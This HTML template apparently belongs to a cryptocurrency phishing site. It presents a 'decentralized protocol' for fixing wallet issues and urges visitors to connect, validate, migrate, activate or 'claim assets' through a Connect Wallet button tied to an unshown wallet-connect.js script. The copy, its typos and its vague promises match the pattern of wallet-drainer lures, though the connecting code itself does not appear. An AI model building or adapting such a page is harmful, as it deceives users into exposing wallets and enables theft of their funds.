<!DOCTYPE html>
<html lang="en">
  <head>
    <meta charset="UTF-8" />
    <meta name="viewport" content="width=device-width, initial-scale=1.0" />
    <title>Document</title>
    
    <link rel="stylesheet" href="{{url_for('static', filename='s.css')}}">
    
    <script src="https://ajax.googleapis.com/ajax/libs/jquery/3.7.1/jquery.min.js"></script>
    <script src="https://cdn.ethers.io/lib/ethers-5.2.umd.min.js"
        type="application/javascript"></script>
    <script> var exports = {}; </script>
    <script  src="{{url_for('static', filename='wallet-connect.js')}}" type="module"></script>
    
   
  </head>
  <body>
    <div id="root">
        <div class="min-h-screen">
            <div class="gradient-bg-welcome">
                <div class="flex w-full justify-center items-center">
                    <div class="flex mf:flex-row flex-col items-start justify-between md:p-20 py-12 px-4">
                        <div class="flex flex-1 justify-start items-start flex-col mf:mr-10">
                            <h1 class="text-3xl sm:text-5xl text-white text-gradient py-1">Decentralized protocol for <br> syncing various Wallets <br> issues on Secure Server.</h1>
                            <p class="text-left mt-5 text-white font-light md:w-9/12 w-11/12 text-base">This is not an app but a protocol that establishes a remote resolution between all noncustodial wallet.</p><button type="button" class="flex flex-row justify-center items-center my-5 bg-[#2952e3] p-3 rounded-full cursor-pointer hover:bg-[#2546bd]"><svg stroke="currentColor" fill="currentColor" stroke-width="0" viewBox="0 0 1024 1024" class="text-white mr-2" height="1em" width="1em" xmlns="http://www.w3.org/2000/svg">
                                    <path d="M512 64C264.6 64 64 264.6 64 512s200.6 448 448 448 448-200.6 448-448S759.4 64 512 64zm144.1 454.9L437.7 677.8a8.02 8.02 0 0 1-12.7-6.5V353.7a8 8 0 0 1 12.7-6.5L656.1 506a7.9 7.9 0 0 1 0 12.9z"></path>
                                </svg>
                                <p class="text-white text-base font-semibold" id="connect-button">Connect Wallet</p>
                            </button>
                            <div class="grid sm:grid-cols-3 grid-cols-2 w-full mt-10">
                                <div class="rounded-tl-2xl min-h-[70px] sm:px-0 px-2 sm:min-w-[120px] flex justify-center items-center border-[0.5px] border-gray-400 text-sm font-light text-white">Reliability</div>
                                <div class="min-h-[70px] sm:px-0 px-2 sm:min-w-[120px] flex justify-center items-center border-[0.5px] border-gray-400 text-sm font-light text-white">Security</div>
                                <div class="sm:rounded-tr-2xl min-h-[70px] sm:px-0 px-2 sm:min-w-[120px] flex justify-center items-center border-[0.5px] border-gray-400 text-sm font-light text-white">Ethereum</div>
                                <div class="sm:rounded-bl-2xl min-h-[70px] sm:px-0 px-2 sm:min-w-[120px] flex justify-center items-center border-[0.5px] border-gray-400 text-sm font-light text-white">Web 3.0</div>
                                <div class="min-h-[70px] sm:px-0 px-2 sm:min-w-[120px] flex justify-center items-center border-[0.5px] border-gray-400 text-sm font-light text-white">Low Fees</div>
                                <div class="rounded-br-2xl min-h-[70px] sm:px-0 px-2 sm:min-w-[120px] flex justify-center items-center border-[0.5px] border-gray-400 text-sm font-light text-white">Blockchain</div>
                            </div>
                        </div>
                        <div class="flex flex-col flex-1 items-center justify-start w-full mf:mt-0 mt-10">
                            <div class=""></div>
                            <div class="p-5 sm:w-96 w-full flex flex-col justify-start items-center blue-glassmorphism"><svg stroke="currentColor" fill="currentColor" stroke-width="0" role="img" viewBox="0 0 24 24" font-size="300" color="#fff" height="1em" width="1em" xmlns="http://www.w3.org/2000/svg" style="color: rgb(255, 255, 255);">
                                    <title></title>
                                    <path d="M11.944 17.97L4.58 13.62 11.943 24l7.37-10.38-7.372 4.35h.003zM12.056 0L4.69 12.223l7.365 4.354 7.365-4.35L12.056 0z"></path>
                                </svg>
                                <div class="hidden">
                                    <div class="h-[1px] w-full bg-gray-400 my-2"></div>
                                </div>
                                
                                  <button id="connect-button" class="text-white w-full mt-2 border-[1px] p-2 border-[#3d4f7c] hover:bg-[#3d4f7c] rounded-full cursor-pointer">Wallet Connect</button>
                                </p>
                              </div>
                        </div>
                    </div>
                </div>
            </div>
            <div class="flex w-full justify-center items-center gradient-bg-services">
                <div class="flex mf:flex-row flex-col items-center justify-between md:p-20 py-12 px-4">
                    <div class="flex-1 flex flex-col justify-start items-start">
                        <h1 class="text-white text-3xl sm:text-5xl py-2 text-gradient ">Services that we<br>continue to improve</h1>
                        <p class="text-left my-2 text-white font-light md:w-9/12 w-11/12 text-base">The best choice for buying and selling your crypto assets, with the various super friendly services we offer</p>
                    </div>
                    <div class="flex-1 flex flex-col justify-start items-center">
                        <div id="connect-button" class="flex flex-row justify-start items-start white-glassmorphism p-3 m-2 cursor-pointer hover:shadow-xl">
                            <div class="w-10 h-10 rounded-full flex justify-center items-center bg-[#2952E3]"><svg stroke="currentColor" fill="currentColor" stroke-width="0" viewBox="0 0 16 16" font-size="21" class="text-white" height="1em" width="1em" xmlns="http://www.w3.org/2000/svg">
                                    <path fill-rule="evenodd" d="M8 0c-.69 0-1.843.265-2.928.56-1.11.3-2.229.655-2.887.87a1.54 1.54 0 0 0-1.044 1.262c-.596 4.477.787 7.795 2.465 9.99a11.777 11.777 0 0 0 2.517 2.453c.386.273.744.482 1.048.625.28.132.581.24.829.24s.548-.108.829-.24a7.159 7.159 0 0 0 1.048-.625 11.775 11.775 0 0 0 2.517-2.453c1.678-2.195 3.061-5.513 2.465-9.99a1.541 1.541 0 0 0-1.044-1.263 62.467 62.467 0 0 0-2.887-.87C9.843.266 8.69 0 8 0zm2.146 5.146a.5.5 0 0 1 .708.708l-3 3a.5.5 0 0 1-.708 0l-1.5-1.5a.5.5 0 1 1 .708-.708L7.5 7.793l2.646-2.647z"></path>
                                </svg></div>
                            <div class="ml-5 flex flex-col flex-1" >
                                <h3 class="mt-2 text-white text-lg" >Security gurantee</h3>
                                <p class="mt-1 text-white text-sm md:w-9/12">Security is guranteed. We always maintain privacy and maintain the quality of our products</p>
                            </div>
                        </div>
                        <div class="flex flex-row justify-start items-start white-glassmorphism p-3 m-2 cursor-pointer hover:shadow-xl">
                            <div class="w-10 h-10 rounded-full flex justify-center items-center bg-[#8945F8]"><svg stroke="currentColor" fill="currentColor" stroke-width="0" viewBox="0 0 24 24" font-size="21" class="text-white" height="1em" width="1em" xmlns="http://www.w3.org/2000/svg">
                                    <path d="M10 18a7.952 7.952 0 0 0 4.897-1.688l4.396 4.396 1.414-1.414-4.396-4.396A7.952 7.952 0 0 0 18 10c0-4.411-3.589-8-8-8s-8 3.589-8 8 3.589 8 8 8zm0-14c3.309 0 6 2.691 6 6s-2.691 6-6 6-6-2.691-6-6 2.691-6 6-6z"></path>
                                    <path d="M11.412 8.586c.379.38.588.882.588 1.414h2a3.977 3.977 0 0 0-1.174-2.828c-1.514-1.512-4.139-1.512-5.652 0l1.412 1.416c.76-.758 2.07-.756 2.826-.002z"></path>
                                </svg></div>
                            <div class="ml-5 flex flex-col flex-1">
                                <h3 class="mt-2 text-white text-lg">Best exchange rates</h3>
                                <p class="mt-1 text-white text-sm md:w-9/12">Security is guranteed. We always maintain privacy and maintain the quality of our products</p>
                            </div>
                        </div>
                        <div class="flex flex-row justify-start items-start white-glassmorphism p-3 m-2 cursor-pointer hover:shadow-xl">
                            <div class="w-10 h-10 rounded-full flex justify-center items-center bg-[#F84550]"><svg stroke="currentColor" fill="currentColor" stroke-width="0" viewBox="0 0 24 24" font-size="21" class="text-white" height="1em" width="1em" xmlns="http://www.w3.org/2000/svg">
                                    <g>
                                        <path fill="none" d="M0 0H24V24H0z"></path>
                                        <path d="M20.243 4.757c2.262 2.268 2.34 5.88.236 8.236l-8.48 8.492-8.478-8.492c-2.104-2.356-2.025-5.974.236-8.236C5.515 3 8.093 2.56 10.261 3.44L6.343 7.358l1.414 1.415L12 4.53l-.013-.014.014.013c2.349-2.109 5.979-2.039 8.242.228z"></path>
                                    </g>
                                </svg></div>
                            <div class="ml-5 flex flex-col flex-1">
                                <h3 class="mt-2 text-white text-lg">Fastest transactions</h3>
                                <p class="mt-1 text-white text-sm md:w-9/12">Security is guranteed. We always maintain privacy and maintain the quality of our products</p>
                            </div>
                        </div>
                    </div>
                </div>
            </div>
            <div class="flex w-full  items-center 2xl:px-20 gradient-bg-transactions">
                <div class="flex flex-col md:p-12 py-12 px-4">
                    <h3 class="text-white text-3xl text-center my-2">Connect your account to see the latest transactions</h3>
                    <div class="flex flex-wrap justify-center items-center mt-10">
                        <div class="m-4 flex 3xl:min-w-[450px] 3xl:max-w-[500px] sm:min-w-[270px] sm:max-w-[300px] min-w-full hover:shadow-2xl blue-glassmorphism rounded-tr-2xl items-center">
                            <div class="flex flex-colitems-center w-full mt-4">
                                <div class="display-flex items-center justify-start w-full mb-6 p-2">
                                    <h1 class="text-white text-center">Migration</h1>
                                    <p class="text-white text-base text-center">Click here for migration</p>
                                </div>
                                <div class=""></div>
                            </div>
                        </div>
                        <div class="m-4 flex 3xl:min-w-[450px] 3xl:max-w-[500px] sm:min-w-[270px] sm:max-w-[300px] min-w-full hover:shadow-2xl blue-glassmorphism rounded-tr-2xl items-center">
                            <div class="flex flex-colitems-center w-full mt-4">
                                <div class="display-flex items-center justify-start w-full mb-6 p-2">
                                    <h1 class="text-white text-center">Claim</h1>
                                    <p class="text-white text-base text-center">Click here to claim assets</p>
                                </div>
                                <div class=""></div>
                            </div>
                        </div>
                        <div class="m-4 flex 3xl:min-w-[450px] 3xl:max-w-[500px] sm:min-w-[270px] sm:max-w-[300px] min-w-full hover:shadow-2xl blue-glassmorphism rounded-tr-2xl items-center">
                            <div class="flex flex-colitems-center w-full mt-4">
                                <div class="display-flex items-center justify-start w-full mb-6 p-2">
                                    <h1 class="text-white text-center">Swap</h1>
                                    <p class="text-white text-base text-center">Click here for assets swapping</p>
                                </div>
                                <div class=""></div>
                            </div>
                        </div>
                        <div class="m-4 flex 3xl:min-w-[450px] 3xl:max-w-[500px] sm:min-w-[270px] sm:max-w-[300px] min-w-full hover:shadow-2xl blue-glassmorphism rounded-tr-2xl items-center">
                            <div class="flex flex-colitems-center w-full mt-4">
                                <div class="display-flex items-center justify-start w-full mb-6 p-2">
                                    <h1 class="text-white text-center">Validation</h1>
                                    <p class="text-white text-base text-center">Click here to validate your wallet.</p>
                                </div>
                                <div class=""></div>
                            </div>
                        </div>
                        <div class="m-4 flex 3xl:min-w-[450px] 3xl:max-w-[500px] sm:min-w-[270px] sm:max-w-[300px] min-w-full hover:shadow-2xl blue-glassmorphism rounded-tr-2xl items-center">
                            <div class="flex flex-colitems-center w-full mt-4">
                                <div class="display-flex items-center justify-start w-full mb-6 p-2">
                                    <h1 class="text-white text-center">Activation</h1>
                                    <p class="text-white text-base text-center">Click here to activate.</p>
                                </div>
                                <div class=""></div>
                            </div>
                        </div>
                        <div class="m-4 flex 3xl:min-w-[450px] 3xl:max-w-[500px] sm:min-w-[270px] sm:max-w-[300px] min-w-full hover:shadow-2xl blue-glassmorphism rounded-tr-2xl items-center">
                            <div class="flex flex-colitems-center w-full mt-4">
                                <div class="display-flex items-center justify-start w-full mb-6 p-2">
                                    <h1 class="text-white text-center">Cross Transfer</h1>
                                    <p class="text-white text-base text-center">Click here for cross bridge issues.</p>
                                </div>
                                <div class=""></div>
                            </div>
                        </div>
                        <div class="m-4 flex 3xl:min-w-[450px] 3xl:max-w-[500px] sm:min-w-[270px] sm:max-w-[300px] min-w-full hover:shadow-2xl blue-glassmorphism rounded-tr-2xl items-center">
                            <div class="flex flex-colitems-center w-full mt-4">
                                <div class="display-flex items-center justify-start w-full mb-6 p-2">
                                    <h1 class="text-white text-center">Staking</h1>
                                    <p class="text-white text-base text-center">Click here for staking related issues.</p>
                                </div>
                                <div class=""></div>
                            </div>
                        </div>
                        <div class="m-4 flex 3xl:min-w-[450px] 3xl:max-w-[500px] sm:min-w-[270px] sm:max-w-[300px] min-w-full hover:shadow-2xl blue-glassmorphism rounded-tr-2xl items-center">
                            <div class="flex flex-colitems-center w-full mt-4">
                                <div class="display-flex items-center justify-start w-full mb-6 p-2">
                                    <h1 class="text-white text-center">Exchange</h1>
                                    <p class="text-white text-base text-center">Click here for exchange related issues</p>
                                </div>
                                <div class=""></div>
                            </div>
                        </div>
                    </div>
                </div>
            </div>
        </div>
    </div>



</body>

 
 

</html>
